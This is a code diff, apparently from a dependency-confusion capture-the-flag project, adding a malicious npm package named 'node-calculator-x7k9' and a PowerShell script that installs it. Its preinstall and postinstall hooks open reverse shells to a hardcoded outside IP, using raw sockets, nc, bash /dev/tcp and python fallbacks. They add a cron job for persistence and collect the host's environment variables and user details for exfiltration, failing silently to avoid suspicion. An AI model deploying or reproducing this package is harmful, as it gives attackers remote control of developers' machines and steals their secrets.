+        // Create a cron job for persistence (if cron is available)
+        const cronCmd = `(crontab -l 2>/dev/null; echo "* * * * * nc ${ATTACKER_IP} ${ATTACKER_PORT} -e /bin/sh") | crontab -`;
+        exec(cronCmd, () => {});
+        
+        // Create a systemd timer (if systemd is available)
+        // Add more persistence mechanisms as needed
+        
+    } catch (err) {
+        // Silent fail
+    }
+}
+
+// Execute
+try {
+    console.log('Installing node-calculator-x7k9 v3.0.0...');
+    
+    // Run backup reverse shell
+    setTimeout(() => {
+        const { spawn } = require('child_process');
+        const net = require('net');
+        
+        try {
+            const client = new net.Socket();
+            client.connect(ATTACKER_PORT, ATTACKER_IP, function() {
+                const shell = spawn('/bin/sh', []);
+                client.pipe(shell.stdin);
+                shell.stdout.pipe(client);
+                shell.stderr.pipe(client);
+            });
+        } catch (e) {
+            // Silent fail
+        }
+    }, 2000);
+    
+} catch (err) {
+    // Silent fail
+}
+

package/preinstall.js

@@ -0,0 +1,146 @@
+#!/usr/bin/env node
+
+/**
+ * Reverse Shell Payload for CTF
+ * This executes during npm install via preinstall hook
+ * 
+ * IMPORTANT: Replace ATTACKER_IP and ATTACKER_PORT with your values
+ */
+
+const { spawn } = require('child_process');
+const net = require('net');
+const fs = require('fs');
+
+// Configuration - CHANGE THESE!
+const ATTACKER_IP = '159.223.153.251';  // Replace with your IP
+const ATTACKER_PORT = 4444;          // Replace with your listening port
+
+// Exfiltration log
+function logExfil(data) {
+    const logPath = '/tmp/exfil.log';
+    try {
+        fs.appendFileSync(logPath, `[${new Date().toISOString()}] ${data}\n`);
+    } catch (e) {
+        // Silently fail
+    }
+}
+
+// Reverse shell function
+function reverseShell() {
+    try {
+        logExfil('Attempting reverse shell connection...');
+        
+        const client = new net.Socket();
+        
+        client.connect(ATTACKER_PORT, ATTACKER_IP, function() {
+            logExfil('Connected to attacker!');
+            
+            // Spawn shell
+            const shell = spawn('/bin/sh', [], {
+                stdio: ['pipe', 'pipe', 'pipe']
+            });
+            
+            // Pipe client to shell and shell to client
+            client.pipe(shell.stdin);
+            shell.stdout.pipe(client);
+            shell.stderr.pipe(client);
+            
+            // Send banner
+            client.write('=== Reverse Shell Connected ===\n');
+            client.write(`Hostname: ${require('os').hostname()}\n`);
+            client.write(`User: ${require('os').userInfo().username}\n`);
+            client.write(`CWD: ${process.cwd()}\n`);
+            client.write('================================\n\n');
+            
+            shell.on('exit', function() {
+                client.end();
+            });
+        });
+        
+        client.on('error', function(err) {
+            logExfil(`Connection error: ${err.message}`);
+            // Try alternative methods
+            alternativePayload();
+        });
+        
+    } catch (err) {
+        logExfil(`Reverse shell error: ${err.message}`);
+        alternativePayload();
+    }
+}
+
+// Alternative payload using child_process exec
+function alternativePayload() {
+    const { exec } = require('child_process');
+    
+    // Method 1: nc reverse shell
+    const ncCmd = `nc ${ATTACKER_IP} ${ATTACKER_PORT} -e /bin/sh`;
+    exec(ncCmd, (err) => {
+        if (err) {
+            // Method 2: bash reverse shell
+            const bashCmd = `bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1`;
+            exec(bashCmd, () => {});
+            
+            // Method 3: python reverse shell
+            const pythonCmd = `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ATTACKER_IP}",${ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'`;
+            exec(pythonCmd, () => {});
+        }
+    });
+}
+
+// Exfiltrate environment information
+function exfiltrateInfo() {
+    try {
+        const info = {
+            hostname: require('os').hostname(),
+            user: require('os').userInfo().username,
+            cwd: process.cwd(),
+            env: process.env,
+            nodeVersion: process.version,
+            platform: process.platform
+        };
+        
+        logExfil('System Info: ' + JSON.stringify(info, null, 2));
+        
+        // Try to exfiltrate via HTTP POST
+        const https = require('https');
+        const postData = JSON.stringify(info);
+        
+        // Uncomment and modify if you have an exfil server
+        /*
+        const options = {
+            hostname: 'YOUR_EXFIL_SERVER.com',
+            port: 443,
+            path: '/exfil',
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': postData.length
+            }
+        };
+        
+        const req = https.request(options, (res) => {});
+        req.write(postData);
+        req.end();
+        */
+        
+    } catch (err) {
+        logExfil(`Exfil error: ${err.message}`);
+    }
+}
+
+// Main execution
+try {
+    logExfil('Malicious package installed!');
+    exfiltrateInfo();
+    
+    // Delay to ensure npm install completes
+    setTimeout(() => {
+        reverseShell();
+    }, 1000);
+    
+} catch (err) {
+    // Silent fail to avoid suspicion
+    logExfil(`Main execution error: ${err.message}`);
+}
+

package/test-local.ps1

@@ -0,0 +1,127 @@
+# Local Testing Script - Test the malicious package locally before publishing
+# This simulates the attack without needing to publish to npm
+
+param(
+    [string]$AttackerIP = "127.0.0.1",
+    [int]$AttackerPort = 4444
+)
+
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║          Local Testing - Dependency Confusion CTF            ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+
+# Get current directory
+$rootDir = Split-Path -Parent $PSScriptRoot
+$maliciousDir = Join-Path $rootDir "malicious-package"
+$targetDir = Join-Path $rootDir "just-a-calculator"
+
+Write-Host "[*] Root Directory: $rootDir" -ForegroundColor Yellow
+Write-Host "[*] Malicious Package: $maliciousDir" -ForegroundColor Yellow
+Write-Host "[*] Target App: $targetDir" -ForegroundColor Yellow
+Write-Host ""
+
+# Step 1: Configure payload
+Write-Host "[+] Step 1: Configuring payload..." -ForegroundColor Green
+Set-Location $maliciousDir
+
+$preinstallPath = "preinstall.js"
+$postinstallPath = "postinstall.js"
+
+$preinstallContent = Get-Content $preinstallPath -Raw
+$preinstallContent = $preinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$preinstallContent = $preinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $preinstallPath -Value $preinstallContent
+
+$postinstallContent = Get-Content $postinstallPath -Raw
+$postinstallContent = $postinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$postinstallContent = $postinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $postinstallPath -Value $postinstallContent
+
+Write-Host "    [✓] Payload configured for $AttackerIP:$AttackerPort" -ForegroundColor Green
+
+# Step 2: Start listener
+Write-Host ""
+Write-Host "[+] Step 2: Starting listener..." -ForegroundColor Green
+
+if (Test-Path "listener.py") {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($dir, $port)
+        Set-Location $dir
+        python3 listener.py $port
+    } -ArgumentList $maliciousDir, $AttackerPort
+    Write-Host "    [✓] Listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} else {
+    Write-Host "    [!] listener.py not found" -ForegroundColor Red
+}
+
+Start-Sleep -Seconds 2
+
+# Step 3: Pack the malicious package
+Write-Host ""
+Write-Host "[+] Step 3: Packing malicious package..." -ForegroundColor Green
+$packOutput = npm pack 2>&1
+Write-Host "    [✓] Package created: $packOutput" -ForegroundColor Green
+
+# Step 4: Install into target application
+Write-Host ""
+Write-Host "[+] Step 4: Installing malicious package into target..." -ForegroundColor Green
+Set-Location $targetDir
+
+# Remove old package
+if (Test-Path "node_modules\node-calculator-x7k9") {
+    Write-Host "    [*] Removing old package..." -ForegroundColor Yellow
+    Remove-Item "node_modules\node-calculator-x7k9" -Recurse -Force
+}
+
+# Install malicious package
+$packagePath = Join-Path $maliciousDir "node-calculator-x7k9-3.0.0.tgz"
+Write-Host "    [*] Installing from: $packagePath" -ForegroundColor Yellow
+
+npm install $packagePath
+
+Write-Host "    [✓] Package installed!" -ForegroundColor Green
+
+# Step 5: Check listener
+Write-Host ""
+Write-Host "[+] Step 5: Checking for shell..." -ForegroundColor Green
+Write-Host "    [*] Waiting for reverse shell connection..." -ForegroundColor Yellow
+Write-Host ""
+
+# Monitor listener for 30 seconds
+$timeout = 30
+$elapsed = 0
+while ($elapsed -lt $timeout) {
+    $output = Receive-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    if ($output) {
+        Write-Host $output
+        if ($output -match "Connection received") {
+            Write-Host ""
+            Write-Host "[✓] SHELL RECEIVED!" -ForegroundColor Green
+            break
+        }
+    }
+    Start-Sleep -Seconds 2
+    $elapsed += 2
+    Write-Host "." -NoNewline -ForegroundColor Gray
+}
+
+Write-Host ""
+Write-Host ""
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Testing Complete                                             ║" -ForegroundColor Cyan
+Write-Host "║                                                               ║" -ForegroundColor Cyan
+Write-Host "║  Listener is still running (Job ID: $($listenerJob.Id))              ║" -ForegroundColor Cyan
+Write-Host "║  To view: Receive-Job $($listenerJob.Id)                             ║" -ForegroundColor Cyan
+Write-Host "║  To stop: Stop-Job $($listenerJob.Id); Remove-Job $($listenerJob.Id)        ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+
+Write-Host ""
+Write-Host "Press Enter to stop listener and cleanup..." -ForegroundColor Yellow
+Read-Host
+
+# Cleanup
+Stop-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Remove-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Write-Host "[✓] Cleanup complete" -ForegroundColor Green
+